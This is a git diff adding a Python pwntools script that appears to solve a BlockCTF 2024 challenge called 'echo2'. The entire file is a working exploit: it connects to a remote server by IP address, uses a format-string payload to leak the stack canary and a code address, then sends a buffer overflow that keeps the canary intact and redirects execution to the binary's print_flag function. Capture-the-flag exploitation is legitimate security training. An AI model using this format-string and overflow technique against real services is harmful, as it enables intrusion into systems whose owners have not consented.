diff --git a/blockctf_2024/echo2/a.py b/blockctf_2024/echo2/a.py
new file mode 100644
index 0000000..8074c1a
--- /dev/null
+++ b/blockctf_2024/echo2/a.py
@@ -0,0 +1,28 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./echo-app2", checksec=False)
+# r = process()
+r = remote("54.85.45.101", 8009)
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# leak
+buf = b"%39$p.%42$p"
+s(buf)
+leaks = r.recvS(34).split(".")
+canary = int(leaks[0], 16)
+log.info("canary: %#x", canary)
+target.address = int(leaks[1], 16)-0x15a1
+log.info("main: %#x", target.address)
+
+# buf
+buf = b"A"*264
+buf += p64(canary)
+buf += p64(0)
+buf += p64(target.sym.print_flag)
+s(buf)
+
+r.interactive()
\ No newline at end of file